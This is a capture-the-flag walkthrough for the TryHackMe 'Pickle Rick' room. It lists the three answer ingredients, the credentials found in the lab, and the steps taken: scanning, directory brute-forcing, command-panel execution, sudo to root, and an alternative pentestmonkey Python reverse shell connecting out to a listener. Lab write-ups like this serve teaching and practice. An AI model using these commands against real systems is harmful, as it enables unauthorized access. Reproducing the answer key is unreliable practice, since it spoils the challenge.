Pickle Rick - TryHackMe Problem Solving
Pickle Rick
A Rick and Morty CTF. Help turn Rick back into a human!
This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.
Deploy the virtual machine on this task and explore the web application: MACHINE_IP
You can also access the web app using the following link: https://LAB_WEB_URL.p.thmlabs.com (this will update when the machine has fully started)
Answer the questions below
1. What is the first ingredient Rick needs?
Ans: mr. meeseek hair
2. Whats the second ingredient Rick needs?
Ans: 1 jerry tear
3. Whats the final ingredient Rick needs?
Ans: fleeb juice
How to solve this problem?
1. First of all, we will open "openvpn."
cmd: sudo openvpn "openvpn file.ovpn"
2. We will do a scan with Nmap.
cmd: nmap IP address
cmd: nikto -h http://ip | tee nikto.log
3. We will find php, sh, html, css, js, py, c, and other files with gobuster.
cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,css,js,html,py,cgi,txt,sh
4. Open your browser, enter your IP address, and select View Source to obtain the username = R1ckRul3s
5. Browsers to IP/robots.txt with "get password" = Wubbalubbadubdub
6. Browsers navigate to IP/login.php and enter their username and password.
7. We'll have to look at the command panel.
command panel: ls
command panel: less Sup3rS3cretPickl3lngred.txt
Get first ingredient
command panel: while read line; do echo $line; done < clue.txt
command panel: grep -R .
8. Check out the source code.
9. Examine the source code at the bottom of the page and "get comments out of the texts."
10. We'll write " | base64 -d " 7 to 10 times until we see the decoded text.
cmd: echo "decode text" | base64 -d
cmd: echo "decode text" | base64 -d | base64 -d
command panel: python3 -c "print('hello')"
command panel: less /home/rick/"second ingredients"; ls
Get second ingredient
command panel: sudo -l
command panel: sudo ls /root
command panel: sudo less /root/3rd.txt
Get final ingredient
OR
11. Browsers to search "pentestmonkey reverse shell" and get
Python:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234)
New cmd: ip addr show tun0
cmd: nc -lnvp "set port number"
command panel: "python3 texts change PC IP address and past"
cmd: sudo bash
cmd: cd
cmd: ls
cmd: cat 3rd.txt
cmd: cd /home
cmd: ls
cmd: cd rick
cmd: ls
cmd: cat *
Comments
Post a Comment